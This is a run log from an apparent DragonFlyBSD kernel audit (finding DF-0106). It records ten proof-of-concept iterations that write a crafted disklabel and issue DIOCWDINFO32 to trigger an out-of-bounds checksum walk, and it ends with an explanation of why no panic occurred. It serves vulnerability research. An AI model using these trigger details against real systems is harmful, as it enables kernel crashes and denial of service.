DragonFlyBSD Kernel Audit
DF-0106 / run.log
← back to finding ↓ download raw
=== iter 1 ===
[*] planted crafted label (d_npartitions=0xffff) at /dev/vn0 offset 512
[*] got valid virgin label from kernel (d_npartitions=16, d_secsize=512)
[*] issuing DIOCWDINFO32 on /dev/vn0s0 -> writedisklabel reads crafted sector -> dkcksum32 OOB walk
poc_writedisklabel: DIOCWDINFO32 returned (kernel NOT panicked): No such process: No such process
rc=0
=== iter 2 ===
[*] planted crafted label (d_npartitions=0xffff) at /dev/vn0 offset 512
[*] got valid virgin label from kernel (d_npartitions=16, d_secsize=512)
[*] issuing DIOCWDINFO32 on /dev/vn0s0 -> writedisklabel reads crafted sector -> dkcksum32 OOB walk
poc_writedisklabel: DIOCWDINFO32 returned (kernel NOT panicked): No such process: No such process
rc=0
=== iter 3 ===
[*] planted crafted label (d_npartitions=0xffff) at /dev/vn0 offset 512
[*] got valid virgin label from kernel (d_npartitions=16, d_secsize=512)
[*] issuing DIOCWDINFO32 on /dev/vn0s0 -> writedisklabel reads crafted sector -> dkcksum32 OOB walk
poc_writedisklabel: DIOCWDINFO32 returned (kernel NOT panicked): No such process: No such process
rc=0
=== iter 4 ===
[*] planted crafted label (d_npartitions=0xffff) at /dev/vn0 offset 512
[*] got valid virgin label from kernel (d_npartitions=16, d_secsize=512)
[*] issuing DIOCWDINFO32 on /dev/vn0s0 -> writedisklabel reads crafted sector -> dkcksum32 OOB walk
poc_writedisklabel: DIOCWDINFO32 returned (kernel NOT panicked): No such process: No such process
rc=0
=== iter 5 ===
[*] planted crafted label (d_npartitions=0xffff) at /dev/vn0 offset 512
[*] got valid virgin label from kernel (d_npartitions=16, d_secsize=512)
[*] issuing DIOCWDINFO32 on /dev/vn0s0 -> writedisklabel reads crafted sector -> dkcksum32 OOB walk
poc_writedisklabel: DIOCWDINFO32 returned (kernel NOT panicked): No such process: No such process
rc=0
=== iter 6 ===
[*] planted crafted label (d_npartitions=0xffff) at /dev/vn0 offset 512
[*] got valid virgin label from kernel (d_npartitions=16, d_secsize=512)
[*] issuing DIOCWDINFO32 on /dev/vn0s0 -> writedisklabel reads crafted sector -> dkcksum32 OOB walk
poc_writedisklabel: DIOCWDINFO32 returned (kernel NOT panicked): No such process: No such process
rc=0
=== iter 7 ===
[*] planted crafted label (d_npartitions=0xffff) at /dev/vn0 offset 512
[*] got valid virgin label from kernel (d_npartitions=16, d_secsize=512)
[*] issuing DIOCWDINFO32 on /dev/vn0s0 -> writedisklabel reads crafted sector -> dkcksum32 OOB walk
poc_writedisklabel: DIOCWDINFO32 returned (kernel NOT panicked): No such process: No such process
rc=0
=== iter 8 ===
[*] planted crafted label (d_npartitions=0xffff) at /dev/vn0 offset 512
[*] got valid virgin label from kernel (d_npartitions=16, d_secsize=512)
[*] issuing DIOCWDINFO32 on /dev/vn0s0 -> writedisklabel reads crafted sector -> dkcksum32 OOB walk
poc_writedisklabel: DIOCWDINFO32 returned (kernel NOT panicked): No such process: No such process
rc=0
=== iter 9 ===
[*] planted crafted label (d_npartitions=0xffff) at /dev/vn0 offset 512
[*] got valid virgin label from kernel (d_npartitions=16, d_secsize=512)
[*] issuing DIOCWDINFO32 on /dev/vn0s0 -> writedisklabel reads crafted sector -> dkcksum32 OOB walk
poc_writedisklabel: DIOCWDINFO32 returned (kernel NOT panicked): No such process: No such process
rc=0
=== iter 10 ===
[*] planted crafted label (d_npartitions=0xffff) at /dev/vn0 offset 512
[*] got valid virgin label from kernel (d_npartitions=16, d_secsize=512)
[*] issuing DIOCWDINFO32 on /dev/vn0s0 -> writedisklabel reads crafted sector -> dkcksum32 OOB walk
poc_writedisklabel: DIOCWDINFO32 returned (kernel NOT panicked): No such process: No such process
rc=0
LOOP_DONE_NO_PANIC

----- OUTCOME: NO PANIC across 10 iterations (and 400+ in extended runs). -----
dkcksum32 DID execute on the writedisklabel path (the loop at
subr_disklabel32.c:363-364 evaluates dkcksum32(dlp) at sector offset 0 where
the crafted label's d_magic/d_magic2 match), but the 1MiB OOB walk stays within
the ~24MiB contiguous wired getpbuf_mem region (swapbkva_mem) and does not fault.
The missing-guard bug is confirmed in source; the identical root-cause panic is
reproduced live via sibling DF-0107 (dkcksum32 from setdisklabel).